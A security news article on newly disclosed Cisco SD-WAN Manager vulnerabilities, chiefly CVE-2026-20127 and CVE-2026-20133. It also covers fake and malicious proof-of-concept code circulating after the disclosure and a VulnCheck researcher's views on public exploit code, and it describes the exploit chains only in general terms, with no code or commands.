Following Cisco’s February 25 disclosure of six new vulnerabilities in its Software-Defined Wide Area Network (SD-WAN) management product, security teams have focused heavily on one critical issue. At least three of these vulnerabilities have been targeted in unauthorized access attempts. One in particular, CVE-2026-20127, received a 10 out of 10 Common Vulnerability Scoring System (CVSS) score and appears to have been leveraged as a zero-day by a threat actor for at least three years.
While CVE-2026-20127 requires immediate attention, researchers at VulnCheck emphasize that organizations should also evaluate CVE-2026-20133, a less publicized but highly impactful vulnerability. Compounding the challenge for defenders is a high volume of unreliable or inaccurate proof-of-concept (PoC) code circulating publicly, which can complicate remediation and testing efforts.
Evaluating CVE-2026-20127 and CVE-2026-20133
CVE-2026-20133 is an information-disclosure vulnerability with a high-severity CVSS score of 7.5. While it is not yet known to be targeted in the wild, VulnCheck researchers demonstrated that it provides file system access capable of retrieving the private key associated with the default "vmanage-admin" user.
Accessing this key compromises the Network Configuration Protocol (NETCONF) used to configure and manage SD-WAN devices. During their security evaluation, the researchers also used the vulnerability to access a shared secret for internal communication, "confd_ipc_secret"—which allows any local user to escalate to root privileges. Unauthorized parties could leverage these secrets to push network configuration changes or alter traffic routing across an organization.
Different search engines indicate that anywhere from 275 to thousands of Cisco SD-WAN Managers are currently accessible from the public internet. To protect these environments, organizations should immediately remove their systems from the browsable web and apply the vendor's security patches for CVE-2026-20127, CVE-2026-20133, and related vulnerabilities.
Navigating unreliable PoC data
Following the initial security advisory, multiple PoC scripts surfaced online claiming to validate CVE-2026-20127. VulnCheck analyzed these submissions and found several to be non-functional or fraudulent.
"Typically for these types of emerging threats, we'll see two, three, five, or more than that," says Caitlin Condon, vice president of security research at VulnCheck. "Sometimes PoCs are completely fake, or nonfunctional, or malicious. It's certainly not unusual these days to see a wave of AI-slop PoCs targeting emerging bugs. We don't see as many valid, public PoCs popping up in the first couple of days after one of these incidents is disclosed."
One functional PoC, developed by GitHub user "zerozenxlabs," did not actually test CVE-2026-20127. Instead, it chained three other newly disclosed SD-WAN Manager vulnerabilities. It combined CVE‑2026‑20128 and CVE‑2026‑20133 to read a credential file, then utilized CVE-2026-20122 to upload a webshell via the application programming interface (API).
For Condon, this trend indicates a shift in how security teams should evaluate risk signals. "Part of the lesson here is that we are seeing very quickly, I think, the devaluation of public PoC code as a first-class risk signal," she explains. "For many organizations, there are too many critical bugs to patch, too many products and vulnerabilities to pay attention to, and be able to prioritize. Organizations are overwhelmed. And usually that emergency take-action moment is when people are saying: 'Hey, there's public PoC for this, now you really need to pay attention.' 'PoC or GTFO' has been one of the common industry adages for many years."
Rather than waiting for public PoCs, Condon advises organizations to prioritize verified indicators of unauthorized access. "It's very difficult to figure out, sometimes, whether fake PoCs are actually fake, because they're convincingly fake," she says. "Real-world exploitation signals have become much more important as the value of public PoCs is being diluted."
The value of verifiable security research
A verified, accurate PoC for CVE-2026-20127 was published on March 11 by a security researcher at Rapid7. Validated research tools like this remain a core part of the security ecosystem, providing defenders with the means to confirm exposure and test their own detection systems.
"Researchers have a super important place in this ecosystem," Condon argues. "Their ability to demonstrate exploitability and validate that a vulnerability really does have real world impact is still critical. I, personally, think that is very useful in the public."
To illustrate this, she points out that a third of vulnerabilities from 2025 still lack public testing code. "But, many of them are being used by multiple ransomware groups," she says. "So the only people who have those exploits in full are adversaries, and they're continuing to be used to [great] effect. Many organizations are very nervous about exploit code being public. I understand where that comes from. However, in that type of situation, is it better for only adversaries — and often several of them, to have that exploit? I'll leave that question for readers to answer, but my position would be: no."